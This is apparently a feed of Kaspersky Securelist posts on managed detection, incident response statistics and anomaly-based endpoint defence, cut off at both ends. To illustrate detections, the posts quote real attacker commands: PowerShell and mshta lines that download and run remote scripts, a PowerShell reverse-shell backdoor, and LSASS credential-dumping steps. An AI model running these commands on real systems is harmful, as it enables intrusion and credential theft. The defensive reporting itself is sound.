“cmd /c C:\Windows\cluster\resource.exe
ase2af6das3fzc2 agasg2aa23gfdgd” /sc onstart /ru
system /F

## staskes.exe is a renamed schtasks.exe file

Later, one more attempt to perform this technique was made. The attacker unpacked an archive containing another malicious utility, and ran it the same way as previously. The created files are presumably related to the MirrorDump tool. As a result, the attacker successfully obtained an LSASS dump. C:\Windows\System32\cmd.exe /C c:\”program files”\7-
zip\7z.exe x -p”KJERfK#L6j4dk321″
c:\programdata\E.zip -o c:\programdata\
C:\Windows\System32\cmd.exe
/C c:\windows\system32\staskes.exe /create /tn Ecoh /tr
“c:\programdata\InEnglish.exe g2@j5js1 0sdfs,48
C:\programdata\EnglishEDouble
C:\programdata\EnglishDDouble
C:\programdata\English1.dll
C:\programdata\English.dmp” /sc onstart /ru system /F C:\Windows\System32\cmd.exe /C c:\windows\system32\staskes.exe /run /tn Ecoh
Then the obtained dump was exported to Exchange server. Afterwards, the attacker deleted all the created files. C:\Windows\System32\cmd.exe /C copy
c:\programdata\Es.zip
c:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\owa\auth\Es.png

Table below contains signs of suspicious activity that were the starting point for investigation.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description
T1003.001:
OS Credential Dumping: LSASS Memory
AV exact detect AV verdict:
PDM:Exploit.Win32.GenericProcess command line:
“C:\Windows\System32\rundll32.exe”
C:\Windows\System32\comsvcs.dll MiniDump
616 C:\programdata\cdera.bin full
Parent process command line:
C:\Windows\System32\wsmprovhost.exe –
Embedding
Grandparent process command line::
C:\Windows\System32\svchost.exe -k
DcomLaunchProcess logon type: 3 (Network logon)
Remotely executed
process memory dump
was detected by AM
engine
616 is LSASS process
PID
T1003.001:
OS Credential Dumping: LSASS Memory
Create section (load DLL)
Execute section (run DLL)
DLL name: C:\programdata\english1.dll
Process:  C:\Windows\System32\lsass.exe
Process PID: 616
Parent process: command line: C:\Windows\System32\wininit.exe
Process integrity level: System
Unknown DLL was loaded and executed within lsass.exe
T1003.001:
OS Credential Dumping: LSASS Memory
Inexact AV detect Internal AV verdict: The file is Security Support
Provider (SSP)
File path: C:\programdata\english1.dll
Process: C:\Windows\System32\lsass.exe
Unknown DLL loaded to lsass is SSP
T1053.005:
Scheduled Task/Job: Scheduled Task
Create process Process command line:
C:\programdata\InEnglish.exe g2@j5js1
0sdfs,48 C:\programdata\EnglishEDouble C:\programdata\EnglishDDouble
C:\programdata\English1.dll
C:\programdata\English.dmp
Parent process command line:
taskeng.exe {7725474B-D9EA-473D-B10D-
AC0572A0AA70} S-1-5-18:NT
AUTHORITY\System:Service:
Grandparent process command line:
C:\Windows\System32\svchost.exe -k netsvcs
Process integrity level: System
Process user SID: S-1-5-18
Suspicious executable from C:\programdata run as scheduled task under System privileges

Observed malicious files:

c:\programdata\e.zip 0x37630451944A1DD027F5A9B643790B10
c:\programdata\es.zip 0x3319BD8B628F8051506EE8FD4999C4C3
c:\programdata\m.zip 0xC15D90F8374393DA2533BAF7359E31F9
c:\programdata\inenglish.exe 0xCB15B1F707315FB61E667E0218F7784D
c:\programdata\english1.dll 0x358C5061B8DF0E0699E936A0F48EAFE1
c:\windows\cluster\resource.exe 0x872A776C523FC33888C410081A650070
c:\windows\cluster\twindump.dll 0xF980FD026610E4D0B31BAA5902785EDE

Conclusion

Attackers follow trends. They use any loophole to break into your corporate network. Sometimes they learn about new vulnerabilities in products earlier than security researchers do. Sometimes they hide so skillfully that their actions are indistinguishable from those of your employees or administrators.

Countering targeted attacks requires extensive experience as well as constant learning. Kaspersky Managed Detection and Response delivers fully managed, individually tailored ongoing detection, prioritization, investigation, and response. As a result, it provides all the major benefits from having your own security operations center without having to actually set one up.

]]>
https://securelist.com/kaspersky-managed-detection-and-response-interesting-cases/105214/feed/ 2 full large medium thumbnail
Incident response analyst report 2020 https://securelist.com/incident-response-analyst-report-2020/104080/ https://securelist.com/incident-response-analyst-report-2020/104080/#respond Mon, 13 Sep 2021 11:00:04 +0000 https://kasperskycontenthub.com/securelist/?p=104080

 Download full report (PDF)

The Incident response analyst report provides insights into incident investigation services conducted by Kaspersky in 2020. We deliver a range of services to help organizations when they are in need: incident response, digital forensics and malware analysis. Data in the report comes from our daily practices with organizations seeking assistance with full-blown incident response or complementary expert activities for their internal incident response teams.

In 2020, the pandemic forced companies to restructure their information security practices, accommodating a work-from-home (WFH) approach. Although key trends in terms of threats have stayed the same, our service approach moved to a near-complete – 97% of all cases – remote delivery.

Geography of incident responses by region, 2020

Geography of incident responses by region, 2020

Most of the incident handling requests were received from the CIS (27.8%), European Union (24.7%) and the Middle East (22.7%) regions. In 2020, organizations seeking our assistance represented a wide spectrum of business sectors, industry, finance, government, telecoms, transportation and healthcare.

Share of incident responses by verticals and industries, 2020

Share of incident responses by vertical and industry, 2020

Industrial businesses were the most affected by cyberattacks (22%), followed by government institutions (19%). Most of our responses were ransomware-related: in 32.7% of true positive cases, the incidents were caused by encrypted files.

Overall, the Incident response analyst report 2020 contains four chapters:

  • Reasons to go for incident response
    Most of the incidents with causes before the impact can be confidently classified as ransomware. This threat is overtaking money theft and other impacts as a more convenient monetization scheme with much broader industry coverage (not just finance).
  • Initial vectors, or how attackers got in
    Security issues with passwords, software vulnerabilities and social engineering combined into an overwhelming majority of initial access vectors during attacks.
  • Tools and exploits
    Almost half of all incident cases included the use of existing OS tools (like LOLbins), well-known offensive tools from GitHub (e.g. Mimikatz, AdFind, Masscan) and specialized commercial frameworks (Cobalt Strike).
  • Attack duration
    We grouped all incident cases into three categories with different attacker dwell times, incident response duration, initial access, and impact from the attack.

To learn more on these topics, please read the full report (English, PDF).

]]>
https://securelist.com/incident-response-analyst-report-2020/104080/feed/ 0 full large medium thumbnail
Managed Detection and Response in Q4 2020 https://securelist.com/managed-detection-and-response-in-q4-2020/103387/ https://securelist.com/managed-detection-and-response-in-q4-2020/103387/#respond Wed, 21 Jul 2021 10:00:04 +0000 https://kasperskycontenthub.com/securelist/?p=103387

 Download full report (PDF)

As cyberattacks become more sophisticated, and security solutions require more resources to analyze the huge amount of data gathered every day, many organizations feel the need for advanced security services that can deal with this growing complexity in real time, 24/7.

This article contains some analytical findings from Managed Detection and Response (MDR) operations during Q4 2020.

What is Kaspersky MDR

Kaspersky MDR uses Kaspersky Endpoint Security and Kaspersky Anti Targeted Attack Platform as low-level telemetry suppliers after MDR license activation. Raw telemetry is initially enriched and correlated in the cloud, then two levels of SOC analysis process the resulting alerts. The first level of SOC analysis is a neural network-based supervised ML model that is trained on alerts investigated by human analysts. The second level consists of on-duty SOC analysts, who triage alerts and provide recommendations on response to customers.

The MDR team also has a dedicated group for threat-hunting activities — proactive searching for threats through raw telemetry to find attacks that were not detected by automated logic, including ML/AI in the MDR cloud infrastructure. The threat-hunting team is responsible for detection engineering, so all threats found manually are then covered with automatic detection and prevention logic to speed up customer protection.
During the reporting period, Kaspersky MDR was used across all industry verticals as shown below along with the share of detected incidents for each.

Data processing pipeline and security operations

In Q4 2020, the average number of collected raw events from one host was around 15 000. This comparatively low amount is explained by comprehensive analysis performed by Kaspersky Endpoint Security right at the endpoint, such as objects reputation checks, and the fact that only a required minimum of telemetry is sent to the cloud for further analysis.

During the reported period, MDR processed approximately 65 000 alerts, followed by an investigation that resulted in 1 506 incidents reported to customers, approximately 93% of which were mapped to the MITRE ATT&CK framework.

From a security operations standpoint, incident processing depends on alert severity. High severity typically requires more time to investigate and provide recommendations on remediation steps.

Incident remediation efficiency

Most of the incidents (80.1%) were detected based on the first analyzed alert. This means that after the first true positive alert, remediation activities stopped the attack from happening and no new alerts were linked to the incident. This demonstrates that remediation is fairly efficient.

Incidents linked to 2-4 alerts account for 15.3%; they represent the main directions for detection engineering, both in new alert development and improvements to existing alerts.

Incidents linked with larger numbers of alerts are related to cases where fast remediation is not efficient or not allowed. Examples of these incidents include a new targeted attack that requires thorough investigation before active response, or security assessment engagements, where active counteraction to attacker is not allowed.

Incident severity

According to the MDR incident severity classification, High-severity incidents are related to human-driven attacks or malware outbreaks with a high impact. Medium severity is related to incidents that significantly affect the efficiency or performance of assets covered by MDR. Finally, Low severity is related to incidents without a significant impact, which still ought to be fixed, for example, infection with grayware, such as adware, riskware, etc.

High-severity incidents can be caused by a number of factors:

  • APT, targeted attack
  • Offensive exercise
  • Artefacts of APT, targeted attack
  • Malware with critical impact
  • Likely-to-be-exploited vulnerability
  • DDOS/DOS with impact
  • Insider threat with impact (subversion, fraud)
  • Social engineering

In the analyzed period, the incident severity statistics and distribution of High-severity incidents were as follows.

Distribution of incidents by criticality Types of High-severity incidents

Almost all of the verticals in the analyzed period were victims of targeted attacks. IT, Government and Industrial are the TOP 3. Companies that suffered from targeted attacks typically engaged in offensive exercises, a sign of adequate risk assessment.

Adversary tactics, techniques and procedures

As for the attack kill-chain stage, we do not see any correlation between incident severity and tactics at the moment of detection, although it might be expected that more complex attacks would be detected at a later stage.

Analysis of the detection technology has confirmed that there is a need for a combination of different detection systems, because the endpoint tactics are efficiently detected by EPP; SB provides better results at analyzing content before it reaches the endpoint, and all network communications are subject to IDS.

Next, there are the top performing (by the number of reported incidents) MITRE ATT&CK techniques, detected by telemetry from each sensor.

Analysis of tools that attackers use in the incidents shows that PowerShell is still number one and especially popular in High-severity incidents.

Recommendations

Analysis of incident statistics suggests the following recommendations on improving the security controls in place.

  • One third of all high-severity incidents were human-driven targeted attacks. Automated tools are not enough for fully detecting these, so manual threat hunting in combination with classical alert-driven monitoring should be implemented.
  • Professional red team exercises are very similar to advanced attacks and are thus a good approach to assessing the organization’s operational efficiency.
  • Nine percent of reported High-severity incidents were successful social engineering attacks, which demonstrates the need for raising employee security awareness.
  • Be ready to detect threats that use every tactic (attack kill chain phase).
  • Even a complex attack consists of simple steps and techniques; the detection of a particular technique can expose the whole attack.
  • Different detection technologies have different levels of efficiency with different attacker techniques. Maintain a variety of security technologies to increase the chances of successful detection.
  • Monitor PowerShell with built-in Windows events or comprehensive EDRs.
]]>
https://securelist.com/managed-detection-and-response-in-q4-2020/103387/feed/ 0 full large medium thumbnail
Adaptive protection against invisible threats https://securelist.com/adaptive-protection-against-invisible-threats/99772/ https://securelist.com/adaptive-protection-against-invisible-threats/99772/#respond Mon, 14 Dec 2020 12:00:59 +0000 https://kasperskycontenthub.com/securelist/?p=99772

Corporate endpoint security technologies for mid-sized companies struggle to surprise us with anything brand new. They provide reliable protection against malware and, when combined with relevant policies, regular updates, and employee cyberhygiene, they can shield a business from a majority of cyber-risks. For some, it may seem like you do not need more security than this… But is that really the case?

The answer, in short, is no. In fact, in most medium-sized companies’ cybersecurity strategies, even with an endpoint solution, there are likely to still be gaps that can and should be closed. In this article, we look at what those gaps are and how to fill them.

Legitimate software can hide risks

Detecting an exploit or trojan that explicitly runs on a device is not a problem for an antivirus solution. But when a malicious script is launched through a legitimate application, this can be a challenge. For example, when a phishing email document is opened in Microsoft Office, all actions will be performed by the office application.

Such authorized software is often used on a large number of devices, and it is not feasible to simply ban access to it. Antivirus solutions will also recognize these files as “trusted”, so may be unable to quickly “understand” that the piece of office software is executing atypical processes initiated by malicious code. Moreover, such activity can sometimes be started by administrators themselves as part of system maintenance. For example, the “trusted” Windows Management Engine on a remote machine can be used for deployment purposes. This further complicates the threat detection process.

What it can lead to: fileless malware, insider threats, miners and ransomware

Downloaders are one type of malware that uses this legitimate software cover. It does not itself perform any direct malicious actions on the device. Instead, it gets to the machine, for example, through a phishing email, and then independently downloads the real malicious code onto it.

There is a specific type of malware – fileless malware – that is often used as a downloader. It does not store itself on the hard disk, therefore tracking it with an ordinary antivirus solution is not easy. Because of that, fileless malware is often used in advanced targeted attacks, such as Platinum APT, whose victims were state and diplomatic organizations. Another example is the advanced PowerGhost cryptominer, which used trusted software for cryptocurrency mining. According to Kaspersky statistics, of all the anomalous activity detected in legitimate Windows Management Instrumentation processes (WMI), two-thirds (67%) were fileless downloaders of the Emotet banking trojan and the WannMine cryptominer. WMI on remote machines is often used by malware for lateral movement.

Malware families running in WMI (download)

Now, some might think that simply tightening policies and scaling down user privileges is the way to stop the malware from starting any process on the device. However, this is not an option, because fileless malware does not need administrator privileges to perform its malicious actions.

Another possible risk of authorized software exploitation occurs when malicious activity is initiated by someone on the network. If the company is lucky, it is just an employee who decided to mine coins using the corporate computing power. But in this case, since the actions are performed by a trusted user, administrators or a security solution may not be able to detect them.

Finally, some forms of malware can use legitimate processes to disguise themselves (svchost.exe, for example), which makes them more difficult to detect manually by IT security teams.

What can help? You need Little Red Riding Hood 2.0, who detects the wolf through external signs and calls lumberjacks before being eaten

To eliminate these threats, IT security teams need technology that allows them to detect any suspicious application activity from a corporate cybersecurity perspective. Spotting anomalies in trusted software helps to identify threats at the very early stages, when the malware is already on the device but before the antivirus reacts to it. This technology, developed by Kaspersky, is called Adaptive Anomaly Control.

To make ​​anomaly detection work, several problems need to be solved. First, how does Adaptive Anomaly Control know which activity is abnormal and which is not? Secondly, if the control notifies an administrator about each deviation, many of the notifications will most likely turn out to be just false positives for scripts launched as part of a workflow. In that situation, the user will immediately want to disable the control.

To resolve that, the technology should first be “trained” to recognize how applications work and what actions are performed regularly by employees as part of their job responsibilities. This minimizes the number of false positives and keeps administrators from going crazy. And, most importantly, if Adaptive Anomaly Control notifies the IT security manager about suspicious activity to ensure they understand when action needs to be taken immediately. Thus, the technology will turn from “the boy who kept crying wolf” into an advanced version of Little Red Riding Hood, who manages to recognize the wolf in the guise of her grandmother early on and call the lumberjacks for help before she gets eaten.

How Adaptive Anomaly Control works

Adaptive Anomaly Control works on the basis of rules, statistics and exceptions. Rules cover three groups of programs: office programs, Windows Management Instrumentation, and script engines and frameworks, as well as the abnormal program activity category. The rules are already developed in the product, so there is no need to write them manually.

List of rules for office applications

To start with, Adaptive Anomaly Control has training mode activated for about two weeks. During this time, it monitors the network and collects statistics on application usage. Technically, Adaptive Anomaly Control mostly analyzes process creation actions. For example, the command line code of a new process, file path and name of executable, and also the calling stack can be analyzed to determine an anomaly. The technology marks regular anomalies, which indicate that processes are started by employees for work purposes. Based on the data received, it then sets exceptions to the rules. If administrators use scripts that could potentially trigger the rules, they can create exceptions before turning on the component, which will improve the quality of the training process.

The training period avoids false positives, but it also helps to catch important anomalies. If a false positive occurs within a rule, administrators can choose not to block the entire network with the exception, but instead configure it for just the particular script that triggered the rule. This mitigates the risk of throwing a global exception that makes the component useless.

The policies can be tuned for different groups of users individually and inherited as part of user profiles. For example, financial department employees would never legitimately need to execute JavaScript, but the development team will. Therefore, for the software development department, some rules may be disabled or provided with numerous exceptions, while for the financial department, they may be turned on. Adaptive Anomaly Control identifies the user group in which the rule is triggered to block or allow execution accordingly.

Adding an exclusion for a user or group

After the training period, when Adaptive Anomaly Control enters combat mode, the component notifies the IT security manager about any anomalies outside of the exceptions specified during the training period. It provides information for investigation, such as what processes triggered the operations, on what computers and under what users.

Example of anomalous activity by Microsoft Word and possible actions

For example, a PowerShell script trying to start a Windows Command Processor, HTML Application Host, or Register Server from office software may be considered suspicious. Launching these activities is technically possible but not typical of regular operation. Let us focus on some real-life examples which Adaptive Anomality Control component detects. Fin7 spear phishing campaigns have included malicious Word documents with DDE execution of PowerShell code, which were detected and blocked (doc MD5: 2C0CFDC5B5653CB3E8B0F8EEEF55FC32).

Fin7 document with DDE execution

Command-line code from inside a document:

powershell  -C ;echo "https://sec[.]gov/";IEX((new-object net.webclient).downloadstring('https[:]//trt.doe.louisiana[.]gov/fonts.txt'))

Another example is the LockiBot’s downloader, which was also started from within office software (doc MD5: 2151D178B6C849E4DDB08E5016A38A9A):

mshta http[:]//%20%20@j[.]mp/asdaaskdasdjijasdiodkaos

Adaptive Anomality Control also detects suspicious drop attempts by office applications. For example, a Qbot document-dropped payload was detected: C:\Arunes\caemyuta\Polaser.exe (doc MD5: 3823617AB2599270A5D10B1331D775FE). Another example of a detected dropper is this Cymulate Framework document activity: %tmp% \c0de203103ce5f0a5463e324c1863eb1_CymulateNativeReverseShell.exe (exe MD5: D8DBF8C20E8EA57796008D0F59104042).

Similarly, with Windows Management Instrumentation, Adaptive Anomaly Control may react if HTML Application Host or a PowerShell script is launched from WMI. In addition, according to Kaspersky research, most malicious activity (62%) is detected in the WMI group. WMI is a common tool among malware developers because of its convenience. It allows for easy starting of PowerShell code and performs a wide range of actions, such as system intelligence collection.

The number of unique users attacked, by detection group (download)

For example, the Silent Break Security framework was detected during lateral movement using WMI, which ran this inline PowerShell code:

powershell -NoP -NonI -W Hidden -C "$pnm='57wXU7nxLgCRzFJ1q';$enk='cX6MKM670IO+B5YCcnL8RWbc27WOIIdNxhq45TAcCdI=';sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('vTxt...<SKIPPED LONG BASE64 STRING>...yULif/Pj/'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"

Such cryptominers as WannaMine and KingMiner also use WMI for spreading across networks. Below, you can see their command-line code that triggered detection:

powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/networks.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/netstat.ps1')}"

mshta.exe vbscript:GetObject("script:http[:]//165233.1eaba4fdae[.]com/r1.txt")(window.close)

In the group of script engines and frameworks, activities such as running dynamic or obfuscated code may be suspicious. For example, LemonDuck’s fileless downloader was detected during lateral movement:

IEX(New-Object Net.WebClient).DownloadString('http[:]//t.amynx[.]com/gim.jsp')

Originally, it was a base64-encoded inline PowerShell script. The decoded version is shown here for convenience.

Another example in the group of script engines is Clipbanker’s scheduled task command line, also originally a base64-encoded inline PowerShell script:

iex $(Get-ItemProperty -Path HKCU:\Software -Name kumi -ErrorAction Stop).kumi

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell code for offensive security, penetration testing and red teaming. An example of a detected fileless PowerShell backdoor:

$sm=(New-Object Net.Sockets.TCPClient(`XX.XX.XX.XX`,9999)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

As part of the abnormal program activity category, files with anomalous names or locations are tracked: for example, a third-party program which has the name of a system file but is not stored in the system folder. Also, suspicious files inside system directories are tracked: for example, a ShadowPad backdoor was started inside a system folder: C:\windows\debug\srv.exe (MD5: DLL-hijacking used, dll MD5: CC2F7D7CA76A5223E936570A076B39B8). Adaptive Anomaly Control detects such activity. Another detected example is a Swisyn backdoor at: C:\windows\system\explorer.exe (MD: 8E0B4BC934519400B872F9BAD8D2E9C6). The botnet Mirai also places its parts in a system folder and gets detected: C:\windows\system\backs.bat (MD5: 7F70B9755911B0CDCFC1EBC56B310B65).

A detailed log of Adaptive Anomaly Control rules applied to various user groups

“Process action blocked” notification

The Adaptive Anomaly Control algorithm shows how the decision-making process performed during the training period. If a rule was not triggered at all during training, the technology will consider the actions associated with this rule as suspicious and block them. If a rule is triggered, an administrator receives a report and decides what the technology should do: block the process or allow it and notify the user. Another option is to extend the training to monitor further the way the rule is working. If the user does not take any action, the control will also continue to work in smart training mode. The training mode time limit is then reset.

Adaptive Anomaly Control training algorithm

If this technology is so effective, then what are all the other protection features needed for?

Adaptive Anomaly Control solves the specific task of early threat detection. It does so automatically and requires no special administration skills or proactive measures. This means the technology cannot detect the malware itself, just its delivery to the network, as well as the potentially dangerous actions launched by the insider, or the malicious activity of programs that have a status of “not a virus”. It is always easier to treat the disease at an early stage, so early detection of threats helps to get rid of them faster, with less workload on the IT and information security departments.

However, it is equally important to use the entire range of protective measures including signature-based malware detection, behavioral analysis, vulnerability detection and patch management, and exploit prevention. These technologies help to bock most generic attacks, which means that advanced protection mechanisms such as Adaptive Anomaly Control are offloaded to detect the really complex evasive threats. Adaptive Anomaly Control is used for covering this specific risky area and it is effective in this role, while other endpoint technologies have to address their respective areas of expertise. This way, the complete cybersecurity solution will be efficient enough to protect the business from cyberthreats.

]]>
https://securelist.com/adaptive-protection-against-invisible-threats/99772/feed/ 0 full large medium thumbnail
Incident Response Analyst Report 2019 https://securelist.com/incident-response-analyst-report-2019/97974/ https://securelist.com/incident-response-analyst-report-2019/97974/#respond Thu, 06 Aug 2020 10:00:34 +0000 https://kasperskycontenthub.com/securelist/?p=97974

 Download full report (PDF)

As an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries’ cyber-incident tactics and techniques used in the wild. In this report, we share our teams’ conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.

The insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.

Executive summary

In 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.

Analysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.

Most of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware’s presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.

Verticals and industries

Adversaries used a variety of initial vectors to compromise victims’ environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.

In addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.

Although we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.

Recommendations

Based on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:

  • Apply complex password policies
  • Avoid management interfaces exposed to the internet
  • Only allow remote access for necessary external services with multi-factor authentication – with necessary privileges only
  • Regular system audits to identify vulnerable services and misconfigurations
  • Continually tune security tools to avoid false positives
  • Apply powerful audit policy with log retention period of at least six months
  • Monitor and investigate all alerts generated by security tools
  • Patch your publicly available services immediately
  • Enhance your email protection and employee awareness
  • Forbid use of PsExec to simplify security operations
  • Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks
  • Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss
  • Back up your data frequently and on separated infrastructure

 

Reasons for incident response

Significant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).

Organizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.

One of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story “Cities under ransomware siege“.

 

Distribution of reasons for top regions

A suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.

Distribution of reasons for industries

Although, different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).

Detection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.

Initial vectors or how adversaries get in

Common initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.

By linking the popular initial compromise vectors with how an incident was detected, we can see detected suspicious files were detected from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks.
Sometimes we act as complimentary experts for a primary incident response team from the victim’s organization and we have no information on all of their findings – hence the ‘Unknown reasons’ on the charts. Malicious emails are most likely to be detected by a variety of security toolstack, but that’s not showing distrubution of 0- to 1-day vulnerabilities.

The distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization’s network perimeter went unnoticed for longest. Social enginnering attacks via email were the most short-lived.

Tools and exploits

30% of all incidents were tied to legitimate tools

In cyberattacks, adversaries use legitimate tools which can’t be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.

Most legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used virtually for any task.

Let’s weight those tools based on occurrence in incidents – we will also see tactics (MITRE ATT&CK) where they are usually applied.

Exploits

Most of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.

MS17-010 SMB service in Microsoft Windows
Remote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc.
CVE-2019-0604 Microsoft Sharepoint
Remote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint.
CVE-2019-19781 Citrix Application Delivery Controller & Citrix Gateway
This vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure.
CVE-2019-0708 RDP service in Microsoft Windows
Remote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service.
CVE-2018-7600 Drupal
Remote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers.
CVE-2019-11510 Pulse Secure SSL VPN
Unauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel.

Attack duration

For a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary’s activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.

Rush hours or days Average weeks Long-lasting months or longer
This category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods.
In some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary’s activity.
This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data.
Such attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group.
Common threat:
Ransomware infection
Common threat:
Financial theft
Common threat:
Cyber-espionage and theft of confidential data
Common attack vector:

  • Downloading of a malicious file by link in email
  • Downloading of a malicious file from infected site
  • Exploitation of vulnerabilities on network perimeter
  • Credentials brute-force attack
Common attack vector:

  • Downloading a malicious file by link in email
  • Exploitation of vulnerabilities on network perimeter
Common attack vector:

  • Exploitation of vulnerabilities on network perimeter
Attack duration (median):
1 day
Attack duration (median):
10 days
Attack duration (median):
122 days
Incident response duration:
Hours to days
Incident response duration:
Weeks
Incident response duration:
Weeks

Operational metrics

False positives rate

False positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn’t have a specialist in threat hunting or they are managed by an external SOC that doesn’t have the full context for an event.

Age of attack

This is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.

How fast we responded

How long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.

How long response took

Distribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.

MITRE ATT&CK tactics and techniques

Conclusion

In 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.

Improved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.

Various tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.

Adversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.

Applying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.

]]>
https://securelist.com/incident-response-analyst-report-2019/97974/feed/ 0 full large medium thumbnail
Kids on the Web in 2020 https://securelist.com/children-report-2020/97191/ https://securelist.com/children-report-2020/97191/#respond Wed, 03 Jun 2020 10:00:15 +0000 https://kasperskycontenthub.com/securelist/?p=97191

